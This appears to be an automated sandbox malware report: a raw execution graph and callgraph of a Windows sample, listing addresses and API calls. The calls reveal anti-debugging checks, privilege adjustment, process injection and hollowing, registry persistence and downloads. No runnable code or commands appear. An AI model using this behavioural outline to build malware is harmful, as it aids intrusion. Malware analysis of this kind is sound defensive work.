                                                                                                                                                                                                                                  execution_graph 1419 7ff6dab81088 GetModuleHandleA GetProcAddress 1420 7ff6dab810bb 1419->1420 1442 7ff6dab82168 1443 7ff6dab82192 InternetOpenW 1442->1443 1444 7ff6dab821cc InternetOpenUrlW 1443->1444 1445 7ff6dab821bf Sleep 1443->1445 1446 7ff6dab82255 HttpQueryInfoA 1444->1446 1447 7ff6dab82203 InternetOpenUrlW 1444->1447 1445->1443 1448 7ff6dab822aa 1446->1448 1449 7ff6dab82284 InternetCloseHandle InternetCloseHandle Sleep 1446->1449 1447->1446 1450 7ff6dab8223a InternetCloseHandle Sleep 1447->1450 1451 7ff6dab822b4 InternetCloseHandle InternetOpenUrlW 1448->1451 1452 7ff6dab82311 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1448->1452 1449->1443 1450->1443 1451->1452 1453 7ff6dab822f6 InternetCloseHandle Sleep 1451->1453 1454 7ff6dab82376 InternetCloseHandle InternetCloseHandle 1452->1454 1455 7ff6dab82390 1452->1455 1453->1443 1456 7ff6dab8240f 1454->1456 1457 7ff6dab82398 InternetReadFile 1455->1457 1458 7ff6dab823e6 InternetCloseHandle InternetCloseHandle 1455->1458 1457->1455 1457->1458 1458->1456 833 7ff6dab83414 893 7ff6dab8153c 833->893 838 7ff6dab8342c ExitProcess 839 7ff6dab83434 1127 7ff6dab840ac GetCurrentProcess OpenProcessToken 839->1127 843 7ff6dab8344f 844 7ff6dab83464 843->844 845 7ff6dab834b3 843->845 846 7ff6dab841ec 3 API calls 844->846 848 7ff6dab834c8 845->848 849 7ff6dab83504 845->849 847 7ff6dab83470 846->847 850 7ff6dab8348a ExitProcess 847->850 851 7ff6dab83477 847->851 852 7ff6dab841ec 3 API calls 848->852 857 7ff6dab8355a 849->857 858 7ff6dab83519 849->858 853 7ff6dab841ec 3 API calls 851->853 854 7ff6dab834d4 852->854 855 7ff6dab83483 853->855 859 7ff6dab834db ExitProcess 854->859 860 7ff6dab834e3 854->860 855->850 856 7ff6dab83492 855->856 1146 7ff6dab832a4 856->1146 1160 7ff6dab83a3c 857->1160 1142 7ff6dab841ec CreateMutexExA 858->1142 1155 7ff6dab83214 860->1155 866 7ff6dab83497 872 7ff6dab834ab ExitProcess 866->872 873 7ff6dab8349e Sleep 866->873 868 7ff6dab834e8 869 7ff6dab834fc ExitProcess 868->869 870 7ff6dab834ef Sleep 868->870 870->868 873->866 874 7ff6dab8352c ExitProcess 875 7ff6dab83534 877 7ff6dab83214 21 API calls 875->877 880 7ff6dab83539 877->880 878 7ff6dab835c6 CreateThread CreateThread CreateThread WaitForMultipleObjects ExitProcess 879 7ff6dab83572 881 7ff6dab841ec 3 API calls 879->881 882 7ff6dab8354d ExitProcess 880->882 883 7ff6dab83540 Sleep 880->883 884 7ff6dab8357e 881->884 883->880 885 7ff6dab83598 ExitProcess 884->885 886 7ff6dab841ec 3 API calls 884->886 887 7ff6dab83591 886->887 887->885 888 7ff6dab835a0 887->888 889 7ff6dab832a4 44 API calls 888->889 890 7ff6dab835a5 889->890 891 7ff6dab835ac Sleep 890->891 892 7ff6dab835b9 ExitProcess 890->892 891->890 1170 7ff6dab8149c LoadLibraryA GetProcAddress 893->1170 895 7ff6dab815c6 1171 7ff6dab8149c LoadLibraryA GetProcAddress 895->1171 897 7ff6dab815e0 1172 7ff6dab814ec LoadLibraryA GetProcAddress 897->1172 899 7ff6dab815fa 1173 7ff6dab814ec LoadLibraryA GetProcAddress 899->1173 901 7ff6dab81614 1174 7ff6dab814ec LoadLibraryA GetProcAddress 901->1174 903 7ff6dab8162e 1175 7ff6dab814ec LoadLibraryA GetProcAddress 903->1175 905 7ff6dab81648 1176 7ff6dab814ec LoadLibraryA GetProcAddress 905->1176 907 7ff6dab81662 1177 7ff6dab814ec LoadLibraryA GetProcAddress 907->1177 909 7ff6dab8167c 1178 7ff6dab814ec LoadLibraryA GetProcAddress 909->1178 911 7ff6dab81696 1179 7ff6dab814ec LoadLibraryA GetProcAddress 911->1179 913 7ff6dab816b0 1180 7ff6dab814ec LoadLibraryA GetProcAddress 913->1180 915 7ff6dab816ca 1181 7ff6dab8149c LoadLibraryA GetProcAddress 915->1181 917 7ff6dab816e4 1182 7ff6dab8149c LoadLibraryA GetProcAddress 917->1182 919 7ff6dab816fe 1183 7ff6dab8149c LoadLibraryA GetProcAddress 919->1183 921 7ff6dab81718 1184 7ff6dab8149c LoadLibraryA GetProcAddress 921->1184 923 7ff6dab81732 1185 7ff6dab814ec LoadLibraryA GetProcAddress 923->1185 925 7ff6dab8174c 1186 7ff6dab814ec LoadLibraryA GetProcAddress 925->1186 927 7ff6dab81766 1187 7ff6dab814ec LoadLibraryA GetProcAddress 927->1187 929 7ff6dab81780 1188 7ff6dab814ec LoadLibraryA GetProcAddress 929->1188 931 7ff6dab8179a 1189 7ff6dab814ec LoadLibraryA GetProcAddress 931->1189 933 7ff6dab817b4 1190 7ff6dab814ec LoadLibraryA GetProcAddress 933->1190 935 7ff6dab817ce 1191 7ff6dab814ec LoadLibraryA GetProcAddress 935->1191 937 7ff6dab817e8 1192 7ff6dab814ec LoadLibraryA GetProcAddress 937->1192 939 7ff6dab81802 1193 7ff6dab814ec LoadLibraryA GetProcAddress 939->1193 941 7ff6dab8181c 1194 7ff6dab814ec LoadLibraryA GetProcAddress 941->1194 943 7ff6dab81836 1195 7ff6dab814ec LoadLibraryA GetProcAddress 943->1195 945 7ff6dab81850 1196 7ff6dab814ec LoadLibraryA GetProcAddress 945->1196 947 7ff6dab8186a 1197 7ff6dab814ec LoadLibraryA GetProcAddress 947->1197 949 7ff6dab81884 1198 7ff6dab814ec LoadLibraryA GetProcAddress 949->1198 951 7ff6dab8189e 1199 7ff6dab814ec LoadLibraryA GetProcAddress 951->1199 953 7ff6dab818b8 1200 7ff6dab814ec LoadLibraryA GetProcAddress 953->1200 955 7ff6dab818d2 1201 7ff6dab814ec LoadLibraryA GetProcAddress 955->1201 957 7ff6dab818ec 1202 7ff6dab814ec LoadLibraryA GetProcAddress 957->1202 959 7ff6dab81906 1203 7ff6dab814ec LoadLibraryA GetProcAddress 959->1203 961 7ff6dab81920 1204 7ff6dab814ec LoadLibraryA GetProcAddress 961->1204 963 7ff6dab8193a 1205 7ff6dab814ec LoadLibraryA GetProcAddress 963->1205 965 7ff6dab81954 1206 7ff6dab814ec LoadLibraryA GetProcAddress 965->1206 967 7ff6dab8196e 1207 7ff6dab814ec LoadLibraryA GetProcAddress 967->1207 969 7ff6dab81988 1208 7ff6dab814ec LoadLibraryA GetProcAddress 969->1208 971 7ff6dab819a2 1209 7ff6dab814ec LoadLibraryA GetProcAddress 971->1209 973 7ff6dab819bc 1210 7ff6dab814ec LoadLibraryA GetProcAddress 973->1210 975 7ff6dab819d6 1211 7ff6dab814ec LoadLibraryA GetProcAddress 975->1211 977 7ff6dab819f0 1212 7ff6dab814ec LoadLibraryA GetProcAddress 977->1212 979 7ff6dab81a0a 1213 7ff6dab814ec LoadLibraryA GetProcAddress 979->1213 981 7ff6dab81a24 1214 7ff6dab814ec LoadLibraryA GetProcAddress 981->1214 983 7ff6dab81a3e 1215 7ff6dab814ec LoadLibraryA GetProcAddress 983->1215 985 7ff6dab81a58 1216 7ff6dab814ec LoadLibraryA GetProcAddress 985->1216 987 7ff6dab81a72 1217 7ff6dab814ec LoadLibraryA GetProcAddress 987->1217 989 7ff6dab81a8c 1218 7ff6dab814ec LoadLibraryA GetProcAddress 989->1218 991 7ff6dab81aa6 1219 7ff6dab814ec LoadLibraryA GetProcAddress 991->1219 993 7ff6dab81ac0 1220 7ff6dab814ec LoadLibraryA GetProcAddress 993->1220 995 7ff6dab81ada 1221 7ff6dab814ec LoadLibraryA GetProcAddress 995->1221 997 7ff6dab81af4 1222 7ff6dab814ec LoadLibraryA GetProcAddress 997->1222 999 7ff6dab81b0e 1223 7ff6dab814ec LoadLibraryA GetProcAddress 999->1223 1001 7ff6dab81b28 1224 7ff6dab814ec LoadLibraryA GetProcAddress 1001->1224 1003 7ff6dab81b42 1225 7ff6dab814ec LoadLibraryA GetProcAddress 1003->1225 1005 7ff6dab81b5c 1226 7ff6dab814ec LoadLibraryA GetProcAddress 1005->1226 1007 7ff6dab81b76 1227 7ff6dab814ec LoadLibraryA GetProcAddress 1007->1227 1009 7ff6dab81b90 1228 7ff6dab814ec LoadLibraryA GetProcAddress 1009->1228 1011 7ff6dab81baa 1229 7ff6dab814ec LoadLibraryA GetProcAddress 1011->1229 1013 7ff6dab81bc4 1230 7ff6dab814ec LoadLibraryA GetProcAddress 1013->1230 1015 7ff6dab81bde 1231 7ff6dab814ec LoadLibraryA GetProcAddress 1015->1231 1017 7ff6dab81bf8 1232 7ff6dab814ec LoadLibraryA GetProcAddress 1017->1232 1019 7ff6dab81c12 1233 7ff6dab814ec LoadLibraryA GetProcAddress 1019->1233 1021 7ff6dab81c2c 1234 7ff6dab814ec LoadLibraryA GetProcAddress 1021->1234 1023 7ff6dab81c46 1235 7ff6dab814ec LoadLibraryA GetProcAddress 1023->1235 1025 7ff6dab81c60 1236 7ff6dab814ec LoadLibraryA GetProcAddress 1025->1236 1027 7ff6dab81c7a 1237 7ff6dab814ec LoadLibraryA GetProcAddress 1027->1237 1029 7ff6dab81c94 1238 7ff6dab814ec LoadLibraryA GetProcAddress 1029->1238 1031 7ff6dab81cae 1239 7ff6dab814ec LoadLibraryA GetProcAddress 1031->1239 1033 7ff6dab81cc8 1240 7ff6dab814ec LoadLibraryA GetProcAddress 1033->1240 1035 7ff6dab81ce2 1241 7ff6dab814ec LoadLibraryA GetProcAddress 1035->1241 1037 7ff6dab81cfc 1242 7ff6dab814ec LoadLibraryA GetProcAddress 1037->1242 1039 7ff6dab81d16 1243 7ff6dab814ec LoadLibraryA GetProcAddress 1039->1243 1041 7ff6dab81d30 1244 7ff6dab814ec LoadLibraryA GetProcAddress 1041->1244 1043 7ff6dab81d4a 1245 7ff6dab814ec LoadLibraryA GetProcAddress 1043->1245 1045 7ff6dab81d64 1246 7ff6dab814ec LoadLibraryA GetProcAddress 1045->1246 1047 7ff6dab81d7e 1247 7ff6dab814ec LoadLibraryA GetProcAddress 1047->1247 1049 7ff6dab81d98 1248 7ff6dab814ec LoadLibraryA GetProcAddress 1049->1248 1051 7ff6dab81db2 1249 7ff6dab814ec LoadLibraryA GetProcAddress 1051->1249 1053 7ff6dab81dcc 1250 7ff6dab814ec LoadLibraryA GetProcAddress 1053->1250 1055 7ff6dab81de6 1251 7ff6dab814ec LoadLibraryA GetProcAddress 1055->1251 1057 7ff6dab81e00 1252 7ff6dab814ec LoadLibraryA GetProcAddress 1057->1252 1059 7ff6dab81e1a 1253 7ff6dab814ec LoadLibraryA GetProcAddress 1059->1253 1061 7ff6dab81e34 1254 7ff6dab814ec LoadLibraryA GetProcAddress 1061->1254 1063 7ff6dab81e4e 1255 7ff6dab814ec LoadLibraryA GetProcAddress 1063->1255 1065 7ff6dab81e68 1256 7ff6dab814ec LoadLibraryA GetProcAddress 1065->1256 1067 7ff6dab81e82 1257 7ff6dab814ec LoadLibraryA GetProcAddress 1067->1257 1069 7ff6dab81e9c 1258 7ff6dab814ec LoadLibraryA GetProcAddress 1069->1258 1071 7ff6dab81eb6 1259 7ff6dab814ec LoadLibraryA GetProcAddress 1071->1259 1073 7ff6dab81ed0 1260 7ff6dab814ec LoadLibraryA GetProcAddress 1073->1260 1075 7ff6dab81eea 1261 7ff6dab814ec LoadLibraryA GetProcAddress 1075->1261 1077 7ff6dab81f04 1262 7ff6dab814ec LoadLibraryA GetProcAddress 1077->1262 1079 7ff6dab81f1e 1263 7ff6dab814ec LoadLibraryA GetProcAddress 1079->1263 1081 7ff6dab81f38 1264 7ff6dab814ec LoadLibraryA GetProcAddress 1081->1264 1083 7ff6dab81f52 1265 7ff6dab814ec LoadLibraryA GetProcAddress 1083->1265 1085 7ff6dab81f6c 1266 7ff6dab814ec LoadLibraryA GetProcAddress 1085->1266 1087 7ff6dab81f86 1267 7ff6dab814ec LoadLibraryA GetProcAddress 1087->1267 1089 7ff6dab81fa0 1268 7ff6dab814ec LoadLibraryA GetProcAddress 1089->1268 1091 7ff6dab81fba 1269 7ff6dab8149c LoadLibraryA GetProcAddress 1091->1269 1093 7ff6dab81fd4 1270 7ff6dab814ec LoadLibraryA GetProcAddress 1093->1270 1095 7ff6dab81fee 1271 7ff6dab814ec LoadLibraryA GetProcAddress 1095->1271 1097 7ff6dab82008 1272 7ff6dab814ec LoadLibraryA GetProcAddress 1097->1272 1099 7ff6dab82022 1273 7ff6dab814ec LoadLibraryA GetProcAddress 1099->1273 1101 7ff6dab8203c 1274 7ff6dab814ec LoadLibraryA GetProcAddress 1101->1274 1103 7ff6dab82056 1275 7ff6dab814ec LoadLibraryA GetProcAddress 1103->1275 1105 7ff6dab82070 1276 7ff6dab814ec LoadLibraryA GetProcAddress 1105->1276 1107 7ff6dab8208a 1277 7ff6dab8149c LoadLibraryA GetProcAddress 1107->1277 1109 7ff6dab820a4 1278 7ff6dab8149c LoadLibraryA GetProcAddress 1109->1278 1111 7ff6dab820be 1279 7ff6dab814ec LoadLibraryA GetProcAddress 1111->1279 1113 7ff6dab820d8 1280 7ff6dab814ec LoadLibraryA GetProcAddress 1113->1280 1115 7ff6dab820f2 1281 7ff6dab814ec LoadLibraryA GetProcAddress 1115->1281 1117 7ff6dab8210c 1282 7ff6dab814ec LoadLibraryA GetProcAddress 1117->1282 1119 7ff6dab82126 1283 7ff6dab814ec LoadLibraryA GetProcAddress 1119->1283 1121 7ff6dab82140 1284 7ff6dab814ec LoadLibraryA GetProcAddress 1121->1284 1123 7ff6dab8215a 1124 7ff6dab831b4 IsDebuggerPresent 1123->1124 1125 7ff6dab831c6 GetCurrentProcess CheckRemoteDebuggerPresent 1124->1125 1126 7ff6dab831c2 1124->1126 1125->1126 1126->838 1126->839 1128 7ff6dab83439 1127->1128 1129 7ff6dab840d2 GetTokenInformation 1127->1129 1138 7ff6dab83cac GetModuleFileNameW 1128->1138 1285 7ff6dab83b1c VirtualAlloc 1129->1285 1131 7ff6dab84103 GetTokenInformation 1132 7ff6dab84130 CloseHandle 1131->1132 1136 7ff6dab8414a AdjustTokenPrivileges CloseHandle 1131->1136 1133 7ff6dab83aec VirtualFree 1132->1133 1134 7ff6dab84145 1133->1134 1134->1128 1286 7ff6dab83aec 1136->1286 1139 7ff6dab83d9a wcsncpy 1138->1139 1140 7ff6dab83cd7 PathFindFileNameW wcslen 1138->1140 1141 7ff6dab83d11 1139->1141 1140->1141 1141->843 1143 7ff6dab84218 GetLastError 1142->1143 1144 7ff6dab83525 1142->1144 1143->1144 1145 7ff6dab84225 CloseHandle 1143->1145 1144->874 1144->875 1145->1144 1289 7ff6dab8388c 1146->1289 1148 7ff6dab832b5 1292 7ff6dab8452c CreateFileW 1148->1292 1150 7ff6dab832cd 1151 7ff6dab8330f CreateThread 1150->1151 1304 7ff6dab8408c 1150->1304 1151->866 1156 7ff6dab8388c 11 API calls 1155->1156 1157 7ff6dab83224 1156->1157 1339 7ff6dab842fc CreateFileW 1157->1339 1161 7ff6dab8370c 3 API calls 1160->1161 1162 7ff6dab83a67 1161->1162 1163 7ff6dab8388c 11 API calls 1162->1163 1164 7ff6dab83a71 GetModuleFileNameW DeleteFileW CopyFileW 1163->1164 1165 7ff6dab83ab3 SetFileAttributesW 1164->1165 1166 7ff6dab8355f 1164->1166 1351 7ff6dab8397c RegOpenKeyExW 1165->1351 1168 7ff6dab833a4 GetVersionExW 1166->1168 1169 7ff6dab833d5 1168->1169 1169->878 1169->879 1170->895 1171->897 1172->899 1173->901 1174->903 1175->905 1176->907 1177->909 1178->911 1179->913 1180->915 1181->917 1182->919 1183->921 1184->923 1185->925 1186->927 1187->929 1188->931 1189->933 1190->935 1191->937 1192->939 1193->941 1194->943 1195->945 1196->947 1197->949 1198->951 1199->953 1200->955 1201->957 1202->959 1203->961 1204->963 1205->965 1206->967 1207->969 1208->971 1209->973 1210->975 1211->977 1212->979 1213->981 1214->983 1215->985 1216->987 1217->989 1218->991 1219->993 1220->995 1221->997 1222->999 1223->1001 1224->1003 1225->1005 1226->1007 1227->1009 1228->1011 1229->1013 1230->1015 1231->1017 1232->1019 1233->1021 1234->1023 1235->1025 1236->1027 1237->1029 1238->1031 1239->1033 1240->1035 1241->1037 1242->1039 1243->1041 1244->1043 1245->1045 1246->1047 1247->1049 1248->1051 1249->1053 1250->1055 1251->1057 1252->1059 1253->1061 1254->1063 1255->1065 1256->1067 1257->1069 1258->1071 1259->1073 1260->1075 1261->1077 1262->1079 1263->1081 1264->1083 1265->1085 1266->1087 1267->1089 1268->1091 1269->1093 1270->1095 1271->1097 1272->1099 1273->1101 1274->1103 1275->1105 1276->1107 1277->1109 1278->1111 1279->1113 1280->1115 1281->1117 1282->1119 1283->1121 1284->1123 1285->1131 1287 7ff6dab83afd VirtualFree 1286->1287 1288 7ff6dab83b10 1286->1288 1287->1288 1288->1128 1323 7ff6dab8370c GetWindowsDirectoryW 1289->1323 1291 7ff6dab838bb 8 API calls 1291->1148 1293 7ff6dab8458d GetFileSize GetProcessHeap RtlAllocateHeap 1292->1293 1294 7ff6dab84586 1292->1294 1295 7ff6dab845e8 ReadFile 1293->1295 1296 7ff6dab845d6 CloseHandle 1293->1296 1294->1150 1297 7ff6dab84637 1295->1297 1298 7ff6dab8460f GetProcessHeap HeapFree CloseHandle 1295->1298 1296->1294 1299 7ff6dab84650 GetProcessHeap HeapFree CloseHandle 1297->1299 1301 7ff6dab84678 1297->1301 1298->1294 1299->1294 1300 7ff6dab847e3 GetProcessHeap HeapFree CloseHandle 1300->1294 1301->1300 1302 7ff6dab84733 GetProcessHeap RtlAllocateHeap 1301->1302 1303 7ff6dab8477c 1302->1303 1303->1300 1328 7ff6dab83fcc CreateToolhelp32Snapshot 1304->1328 1307 7ff6dab810d8 OpenProcess 1308 7ff6dab8111f 1307->1308 1320 7ff6dab81115 1307->1320 1335 7ff6dab813c4 GetModuleHandleA GetProcAddress 1308->1335 1310 7ff6dab8112c 1311 7ff6dab811fe VirtualAllocEx 1310->1311 1310->1320 1312 7ff6dab8124f WriteProcessMemory 1311->1312 1311->1320 1313 7ff6dab81286 WriteProcessMemory 1312->1313 1312->1320 1314 7ff6dab812d1 1313->1314 1313->1320 1337 7ff6dab81444 GetSystemInfo 1314->1337 1317 7ff6dab812fe GetModuleHandleA GetProcAddress 1319 7ff6dab81338 1317->1319 1317->1320 1318 7ff6dab81444 GetSystemInfo 1321 7ff6dab812f4 1318->1321 1319->1320 1322 7ff6dab81399 CloseHandle 1319->1322 1320->1151 1321->1317 1321->1322 1322->1320 1324 7ff6dab83756 1323->1324 1325 7ff6dab83760 GetVolumeInformationW 1323->1325 1324->1325 1326 7ff6dab837dc 1325->1326 1327 7ff6dab83846 wsprintfW 1326->1327 1327->1291 1329 7ff6dab84007 Process32FirstW 1328->1329 1330 7ff6dab832fa 1328->1330 1331 7ff6dab84026 wcscmp 1329->1331 1332 7ff6dab84061 CloseHandle 1329->1332 1330->1307 1333 7ff6dab8403d 1331->1333 1334 7ff6dab8404a Process32NextW 1331->1334 1332->1330 1333->1332 1334->1331 1334->1332 1336 7ff6dab813ff 1335->1336 1336->1310 1338 7ff6dab812ea 1337->1338 1338->1317 1338->1318 1340 7ff6dab84373 GetLastError 1339->1340 1341 7ff6dab84352 1339->1341 1343 7ff6dab83237 CreateThread Sleep CreateThread 1340->1343 1345 7ff6dab8424c GetFileSize 1341->1345 1343->868 1350 7ff6dab83b1c VirtualAlloc 1345->1350 1347 7ff6dab84278 1348 7ff6dab842c2 CloseHandle 1347->1348 1349 7ff6dab8428c SetFilePointer ReadFile 1347->1349 1348->1343 1349->1348 1350->1347 1352 7ff6dab839bd 1351->1352 1353 7ff6dab839c1 RegSetValueExW RegCloseKey 1351->1353 1352->1166 1353->1352 1354 7ff6dab83384 1357 7ff6dab824d4 GetModuleFileNameW 1354->1357 1358 7ff6dab82555 1357->1358 1364 7ff6dab82550 1357->1364 1359 7ff6dab825a9 1358->1359 1360 7ff6dab82593 1358->1360 1400 7ff6dab82414 ExpandEnvironmentStringsW 1359->1400 1361 7ff6dab8259d 1360->1361 1362 7ff6dab825c7 1360->1362 1361->1364 1402 7ff6dab82494 ExpandEnvironmentStringsW 1361->1402 1401 7ff6dab82454 ExpandEnvironmentStringsW 1362->1401 1365 7ff6dab825be 1365->1364 1368 7ff6dab82619 CreateProcessW 1365->1368 1368->1364 1369 7ff6dab82674 CreateFileW 1368->1369 1369->1364 1370 7ff6dab826bb GetFileSize 1369->1370 1371 7ff6dab826d9 1370->1371 1372 7ff6dab826e3 CloseHandle 1370->1372 1371->1372 1373 7ff6dab826f3 VirtualAlloc 1371->1373 1372->1364 1374 7ff6dab8272d ReadFile 1373->1374 1375 7ff6dab8271d CloseHandle 1373->1375 1376 7ff6dab8277d CloseHandle GetThreadContext 1374->1376 1377 7ff6dab8275a VirtualFree CloseHandle 1374->1377 1375->1364 1378 7ff6dab827cd VirtualFree 1376->1378 1379 7ff6dab827e5 ReadProcessMemory GetModuleHandleA GetProcAddress 1376->1379 1377->1364 1378->1364 1380 7ff6dab82868 1379->1380 1381 7ff6dab8286c VirtualFree 1380->1381 1382 7ff6dab82884 VirtualAllocEx 1380->1382 1381->1364 1383 7ff6dab82907 WriteProcessMemory 1382->1383 1384 7ff6dab828ef VirtualFree 1382->1384 1385 7ff6dab8293d VirtualFree 1383->1385 1389 7ff6dab82955 1383->1389 1384->1364 1385->1364 1386 7ff6dab8298b WriteProcessMemory 1388 7ff6dab82a16 VirtualFree 1386->1388 1386->1389 1387 7ff6dab82a33 1390 7ff6dab82aa5 RtlCompareMemory 1387->1390 1391 7ff6dab82d24 WriteProcessMemory SetThreadContext 1387->1391 1388->1364 1389->1386 1389->1387 1390->1387 1397 7ff6dab82af8 1390->1397 1392 7ff6dab82daa VirtualFree 1391->1392 1393 7ff6dab82dbf ResumeThread 1391->1393 1392->1364 1394 7ff6dab82de6 VirtualFree 1393->1394 1395 7ff6dab82dd1 VirtualFree 1393->1395 1394->1364 1395->1364 1396 7ff6dab82d1f 1396->1391 1397->1396 1398 7ff6dab82c28 ReadProcessMemory WriteProcessMemory 1397->1398 1398->1397 1399 7ff6dab82cfd VirtualFree 1398->1399 1399->1364 1400->1365 1401->1365 1402->1365 1403 7ff6dab83184 1404 7ff6dab8318d 1403->1404 1405 7ff6dab831a6 1404->1405 1408 7ff6dab83004 1404->1408 1413 7ff6dab82e04 CreateMutexA 1408->1413 1411 7ff6dab83064 Sleep 1411->1404 1412 7ff6dab8301f Sleep CreateThread WaitForSingleObject 1412->1411 1414 7ff6dab82e4d GetLastError 1413->1414 1415 7ff6dab82e30 ReleaseMutex CloseHandle 1413->1415 1417 7ff6dab82e5a ReleaseMutex CloseHandle 1414->1417 1418 7ff6dab82e77 ReleaseMutex CloseHandle 1414->1418 1416 7ff6dab82e8f 1415->1416 1416->1411 1416->1412 1417->1416 1418->1416 1421 7ff6dab82ea4 CreateMutexA 1422 7ff6dab82ec9 ReleaseMutex CloseHandle 1421->1422 1423 7ff6dab82ee6 GetLastError 1421->1423 1424 7ff6dab82f28 1422->1424 1425 7ff6dab82ef3 ReleaseMutex CloseHandle 1423->1425 1426 7ff6dab82f10 ReleaseMutex CloseHandle 1423->1426 1425->1424 1426->1424 1427 7ff6dab82f34 1428 7ff6dab8388c 11 API calls 1427->1428 1429 7ff6dab82f73 1428->1429 1430 7ff6dab8452c 17 API calls 1429->1430 1431 7ff6dab82f97 1430->1431 1432 7ff6dab8408c 5 API calls 1431->1432 1433 7ff6dab82fba 1432->1433 1434 7ff6dab810d8 10 API calls 1433->1434 1435 7ff6dab82fcf GetProcessHeap HeapFree 1434->1435 1436 7ff6dab83344 1437 7ff6dab824d4 36 API calls 1436->1437 1438 7ff6dab83354 1437->1438 1459 7ff6dab83074 1465 7ff6dab8307d 1459->1465 1460 7ff6dab83169 1463 7ff6dab83bec RegDeleteKeyW 1463->1465 1464 7ff6dab83dec 9 API calls 1464->1465 1465->1460 1465->1463 1465->1464 1466 7ff6dab8397c 3 API calls 1465->1466 1468 7ff6dab8440c CreateFileW 1465->1468 1473 7ff6dab83b4c RegOpenKeyExW 1465->1473 1467 7ff6dab83159 Sleep 1466->1467 1467->1465 1469 7ff6dab84467 1468->1469 1470 7ff6dab844a2 1468->1470 1476 7ff6dab8438c SetFilePointer WriteFile SetEndOfFile 1469->1476 1470->1465 1472 7ff6dab84483 SetFileAttributesW CloseHandle 1472->1470 1474 7ff6dab83bda 1473->1474 1475 7ff6dab83ba0 RegSetValueExW RegCloseKey 1473->1475 1474->1465 1475->1474 1476->1472

                                                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                                                                  callgraph 0 Function_00007FF6DAB842FC 88 Function_00007FF6DAB8424C 0->88 1 Function_00007FF6DAB8DE04 2 Function_00007FF6DAB8EA05 3 Function_00007FF6DAB8E9F6 4 Function_00007FF6DAB83004 5 Function_00007FF6DAB82E04 4->5 6 Function_00007FF6DAB8BBF7 7 Function_00007FF6DAB8C4F8 8 Function_00007FF6DAB8BBF9 9 Function_00007FF6DAB81000 10 Function_00007FF6DAB8BBFB 11 Function_00007FF6DAB8370C 34 Function_00007FF6DAB836DC 11->34 12 Function_00007FF6DAB8440C 58 Function_00007FF6DAB8438C 12->58 13 Function_00007FF6DAB83414 15 Function_00007FF6DAB83214 13->15 33 Function_00007FF6DAB83EDC 13->33 44 Function_00007FF6DAB841EC 13->44 70 Function_00007FF6DAB833A4 13->70 71 Function_00007FF6DAB832A4 13->71 74 Function_00007FF6DAB840AC 13->74 75 Function_00007FF6DAB83CAC 13->75 78 Function_00007FF6DAB831B4 13->78 82 Function_00007FF6DAB8153C 13->82 83 Function_00007FF6DAB83A3C 13->83 14 Function_00007FF6DAB82414 15->0 60 Function_00007FF6DAB8388C 15->60 16 Function_00007FF6DAB8EC09 17 Function_00007FF6DAB8D70B 18 Function_00007FF6DAB83B1C 19 Function_00007FF6DAB8EC20 20 Function_00007FF6DAB83C2C 21 Function_00007FF6DAB8452C 23 Function_00007FF6DAB844BC 21->23 22 Function_00007FF6DAB82F34 22->20 22->21 36 Function_00007FF6DAB810D8 22->36 59 Function_00007FF6DAB8408C 22->59 22->60 24 Function_00007FF6DAB8B2C0 25 Function_00007FF6DAB8E6C5 26 Function_00007FF6DAB836C4 27 Function_00007FF6DAB813C4 28 Function_00007FF6DAB8EDB8 29 Function_00007FF6DAB835C1 30 Function_00007FF6DAB83FCC 31 Function_00007FF6DAB824D4 31->14 63 Function_00007FF6DAB82494 31->63 94 Function_00007FF6DAB82454 31->94 32 Function_00007FF6DAB8E6CD 35 Function_00007FF6DAB8CCE1 36->9 36->27 85 Function_00007FF6DAB81444 36->85 37 Function_00007FF6DAB8D2E3 38 Function_00007FF6DAB8C2E4 39 Function_00007FF6DAB8D2E5 40 Function_00007FF6DAB8B0D8 41 Function_00007FF6DAB901DA 42 Function_00007FF6DAB83AEC 43 Function_00007FF6DAB814EC 45 Function_00007FF6DAB83DEC 46 Function_00007FF6DAB83BEC 47 Function_00007FF6DAB8BBF2 48 Function_00007FF6DAB8F7E6 49 Function_00007FF6DAB8D2E7 50 Function_00007FF6DAB8397C 51 Function_00007FF6DAB8E07F 52 Function_00007FF6DAB8B776 53 Function_00007FF6DAB83384 53->31 54 Function_00007FF6DAB83184 54->4 55 Function_00007FF6DAB8B778 56 Function_00007FF6DAB8E079 57 Function_00007FF6DAB8147F 59->30 60->11 61 Function_00007FF6DAB81088 62 Function_00007FF6DAB8DA94 64 Function_00007FF6DAB8E289 65 Function_00007FF6DAB8149C 66 Function_00007FF6DAB8E0A1 67 Function_00007FF6DAB901A2 68 Function_00007FF6DAB8F6A3 69 Function_00007FF6DAB8E0A5 71->20 71->21 71->36 71->59 71->60 72 Function_00007FF6DAB82EA4 73 Function_00007FF6DAB8CE9D 74->18 74->42 76 Function_00007FF6DAB900B0 77 Function_00007FF6DAB8E6B4 79 Function_00007FF6DAB836B4 80 Function_00007FF6DAB8FEA9 81 Function_00007FF6DAB8E4AB 82->43 82->65 83->11 83->50 83->60 84 Function_00007FF6DAB83344 84->31 86 Function_00007FF6DAB8DC37 87 Function_00007FF6DAB8B04E 88->18 89 Function_00007FF6DAB83B4C 90 Function_00007FF6DAB8C14F 91 Function_00007FF6DAB8B052 92 Function_00007FF6DAB8B152 93 Function_00007FF6DAB83555 95 Function_00007FF6DAB8F747 96 Function_00007FF6DAB8B248 97 Function_00007FF6DAB8F749 98 Function_00007FF6DAB8F74B 99 Function_00007FF6DAB8B061 100 Function_00007FF6DAB83364 100->31 101 Function_00007FF6DAB8B05A 102 Function_00007FF6DAB8D65A 103 Function_00007FF6DAB8FE5A 104 Function_00007FF6DAB8B26F 105 Function_00007FF6DAB8EC71 106 Function_00007FF6DAB8B772 107 Function_00007FF6DAB8EA72 108 Function_00007FF6DAB82168 109 Function_00007FF6DAB83074 109->12 109->45 109->46 109->50 109->89 110 Function_00007FF6DAB8E668

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00007FF6DAB83414 Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
